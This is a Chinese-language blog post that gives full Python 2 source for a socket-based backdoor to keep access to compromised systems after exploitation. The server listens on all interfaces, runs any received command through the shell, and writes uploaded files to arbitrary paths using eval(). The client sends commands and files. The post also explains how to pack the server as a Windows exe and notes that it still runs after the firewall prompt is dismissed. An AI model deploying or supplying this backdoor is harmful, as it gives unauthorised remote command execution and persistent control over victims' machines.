利用python socket编写后门

Saturday, February 2nd 2019, 11:00 am

在获取系统权限时候,一般想维持权限或者做端口转发的时候,会用一些端口转发的工具,例如nc,ew,lcx等。

但在这种类似后门的工具中被查杀率和存在后门的情况时有发生,本人就遇到过获取系统权限创建账号后,发现没多久又被植入其他隐藏账号的情况。

因此,既然会写一些代码就简单的来实现一个利用socket通信的后门脚本。

如下server端:

# coding:utf-8

import socket
import subprocess

# server

def server_main(ips):
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        server.bind(("0.0.0.0", ips))
        server.listen(5)
        print "[*] Listening on %s:%d" %(socket.gethostname(),ips)
        while True:
            data, addr = server.accept()
            buf = data.recv(4096)
            print "[*] recv command = %s" %buf
            if len(buf) != 0:
                if is_file(buf):
                    rev = upload(buf)
                else:
                    rev = run_command(buf)
            data.send(rev)
    except:
        print "Exception!"

def is_file(buf):
    try:
        if isinstance(eval(buf), dict):
            return True
    except:
        return False


def run_command(command):
    command = command.strip()
    try:
        p = subprocess.Popen(command, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
        out, err = p.communicate()
    except:
        out = "Fail to execute command!"
    return out


def upload(data):
    try:
        path = eval(data)['path']
        file = eval(data)['request']
        with open(path, 'wb') as f:
            f.write(file)
        return "OK"
    except:
        return "Fail"

if __name__ == "__main__":
    ip = input("PORT = ")
    server_main(int(ip))

client端:

#coding:utf-8

import socket

# client

# use:
# >> command   eg:>> whoami
# >> upload 要上传的源文件 要上传到的目标地址文件  >> upload d:/a.txt e:/a.txt

def client(ips, data):
    resp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        resp.settimeout(10)
        resp.connect(ips)
        resp.send(data)
        out = resp.recv(4096)
        resp.close()
    except :
        out = "Except Or Time out !"
    return out

def client_send(target, port):
    while True:
        data = raw_input(">> ")
        if 'upload' not in data:
            out = client((target,port),data)
            print "[*] Command Out= %s" % out
        else:
            upload((target,port),data)


def upload(ips,data):
    file = data.split(' ')
    list_a = {}
    name = file[1].replace('\\','/')
    list_a['path'] = file[2]
    request = ''
    with open(name,'rb') as f:
        for i in f.readlines():
            request+=i
    list_a['request'] = request
    out = client(ips, str(list_a))
    if "OK" in out:
        print "[*] File Write Success !"
    else:
        print "[*] File Write Fail !"

if __name__ == "__main__":
    ip = raw_input("IP:PORT = ")
    list_a = ip.split(":")
    client_send(list_a[0], int(list_a[1]))

代码实现简单,问题在执行的时候是一个正向连接,在服务器开放端口,所以在一定情况下,需要较高的权限。当然这也是后渗透中需要得到的目标。

同时可以利用pyinstaller打包为exe文件在win下运行,不过开放防火墙就需要添加网络允许,但本人尝试中发现,对防火墙端口添加的提示中直接关闭窗口提示,再次运行就可以正常使用。防火墙中也没有启用此运行规则。尚不清楚原因。



原文作者:Misaki

原文链接:https://misakikata.github.io/2019/02/%E5%88%A9%E7%94%A8python-socket%E7%BC%96%E5%86%99%E5%90%8E%E9%97%A8/

发表日期:February 2nd 2019, 11:00:50 am

更新日期:February 1st 2019, 11:51:10 am

版权声明:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可



# python  

tocToc: